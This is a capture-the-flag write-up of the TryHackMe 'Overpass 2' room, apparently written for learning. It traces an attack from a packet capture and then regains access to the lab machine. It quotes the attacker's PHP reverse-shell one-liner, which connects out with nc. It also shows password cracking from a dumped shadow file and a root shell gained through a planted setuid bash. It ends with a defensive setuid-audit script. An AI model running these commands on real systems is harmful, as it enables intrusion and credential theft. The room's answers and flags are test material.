TryHackMe - Overpass 2 - Hacked - Writeup

Overpass has been hacked! Can you analyse the attacker’s actions and hack back in?

Forensics - Analyse the PCAP

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.

Can you work out how the attacker got in, and hack your way back into Overpass’ production server?

Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Learn Linux as a bare minimum.

md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc


  • What was the URL of the page they used to upload a reverse shell?

    Check overpass2.pcapng line number 27.

    Answer: /development/

  • What payload did the attacker use to gain access?

    Check overpass2.pcapng line number 14 POST request.

    Answer: <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

  • What password did the attacker use to privesc?

    Check overpass2.pcapng line number 76.

    Answer: whenevernoteartinstant

  • How did the attacker establish persistence?

    Check overpass2.pcapng line number 120.

    Answer: https://github.com/NinjaJc01/ssh-backdoor

  • Using the fasttrack wordlist, how many of the system passwords were crackable?

    At line number 114 of overpass2.pcapng the attacker dumps the shadow file. Save those hashes to a file and try to crack them with john:

    Answer: 4

root@ip-10-10-204-217:~# john --wordlist=/usr/share/wordlists/fasttrack.txt hash.txzt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12         (bee)
abcd123          (szymex)
1qaz2wsx         (muirland)
secuirty3        (paradox)
4g 0:00:00:02 DONE (2021-05-23 18:14) 1.351g/s 75.00p/s 375.0c/s 375.0C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Research - Analyse the code

Now that you’ve found the code for the backdoor, it’s time to analyse it.

  • What’s the default hash for the backdoor?

    Clone the SSH backdoor repository; main.go contains a hash variable holding the default hash.

    Answer: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

  • What’s the hardcoded salt for the backdoor?

    The last line of main.go contains a hash value, which is the backdoor's hardcoded salt.

    Answer: 1c362db832f3f864c8c2fe05f2002a05

  • What was the hash that the attacker used? - go back to the PCAP for this!

    At line number 3479 of the PCAP the attacker supplies this hash.

    Answer: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

  • Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

    Let's crack the hash with hashcat and the rockyou.txt wordlist. Mode 1710 is sha512($pass.$salt), so the input line in hash.txt must be combined as hash:salt:

    hashcat --force -m 1710 -a 0 hash.txt /usr/share/wordlists/rockyou.txt


    Answer: november16

Attack - Get back in!

  • The attacker defaced the website. What message did they leave as a heading?

    Visit MACHINE_IP in a browser and read the heading on the defaced page.

    Answer: H4ck3d by CooctusClan

  • Using the information you’ve found previously, hack your way back in!

    Answer: Not required

Nmap Scan

root@ip-10-10-50-126:~# nmap -sVC -A 10.10.53.38

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-24 08:02 BST
Nmap scan report for ip-10-10-53-38.eu-west-1.compute.internal (10.10.53.38)
Host is up (0.00047s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (EdDSA)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
MAC Address: 02:3B:97:A6:85:71 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=5/24%OT=22%CT=1%CU=38047%PV=Y%DS=1%DC=D%G=Y%M=023B97%T
OS:M=60AB4FA8%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms ip-10-10-53-38.eu-west-1.compute.internal (10.10.53.38)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.13 seconds

On line number 72 of overpass2.pcapng I found the username james. Let's try to log in over SSH. Port 22 would not let me in with the previously cracked password november16, so let's try port 2222:

root@ip-10-10-50-126:~# ssh james@10.10.53.38 -p 2222
The authenticity of host '[10.10.53.38]:2222 ([10.10.53.38]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.10.53.38]:2222' (RSA) to the list of known hosts.
james@10.10.53.38's password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

james@overpass-production:/home/james/ssh-backdoor$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
james@overpass-production:/home/james/ssh-backdoor$ 

Login over SSH succeeded; we have the user shell and can read user.txt.

  • What’s the user flag?

    Answer: thm{d119b4fa8c497ddb0525f7ad200e6567}

The home directory of the logged-in user contains a setuid root binary, .suid_bash:

james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james    4096 Jul 22  2020 .
drwxr-xr-x 7 root  root     4096 Jul 21  2020 ..
lrwxrwxrwx 1 james james       9 Jul 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21  2020 .cache
drwx------ 3 james james    4096 Jul 21  2020 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22  2020 .local
-rw------- 1 james james      51 Jul 21  2020 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21  2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22  2020 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22  2020 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22  2020 user.txt
drwxrwxr-x 7 james james    4096 Jul 21  2020 www

Running it with -p keeps the root effective uid instead of dropping it; we got root and read the root flag:

james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606c333873144d}

  • What's the root flag?

    Answer: thm{d53b2684f169360bb9606c333873144d}
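The .suid_bash binary is the kind of persistence a responder should be sweeping for after an incident like this one. The following added example (not from the room) audits a directory tree for setuid or setgid executables, the check that would have surfaced /home/james/.suid_bash. The demo builds a constructed directory in a temporary folder rather than scanning /home; point find_setuid at a real path to use it.

```python
"""
Added example: find setuid/setgid executables under a directory tree.
Not part of the room; demo() builds a constructed tree in a temp directory.
"""
import os
import stat
import tempfile


def find_setuid(root: str):
    """Return (path, octal mode, owner uid) for regular files under root that
    carry the setuid or setgid bit. lstat is used so symlinks into /usr/bin
    (like .bash_history -> /dev/null in the writeup) are not followed."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return hits


def describe(hit) -> str:
    """One report line per finding, in the style of a triage note."""
    path, mode, uid = hit
    return f"{path} mode {mode} owner uid {uid}"


def demo():
    """Constructed scenario: a user home with one flag file and one setuid binary."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "james")
        os.makedirs(home)
        with open(os.path.join(home, "user.txt"), "w") as f:
            f.write("flag\n")
        suid = os.path.join(home, ".suid_bash")
        with open(suid, "wb") as f:
            f.write(b"#!/bin/sh\n")
        # The writeup's binary is rwsr-sr-x (6755); setuid alone is enough for the check,
        # and a non-root user can set it on a file they own.
        os.chmod(suid, 0o4755)
        hits = find_setuid(tmp)
        return [os.path.relpath(path, tmp) for path, _mode, _uid in hits]


if __name__ == "__main__":
    # Real use, as root: for hit in find_setuid("/home"): print(describe(hit))
    print(demo())
```

In practice the findings are compared against a baseline of expected setuid binaries (those in /usr/bin and /bin shipped by packages); anything under /home, /tmp or /var/tmp, or owned by root outside package-managed paths, deserves a look.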

TryHackMe room link: Overpass 2 - Hacked

Thanks for reading.

Written on May 23, 2021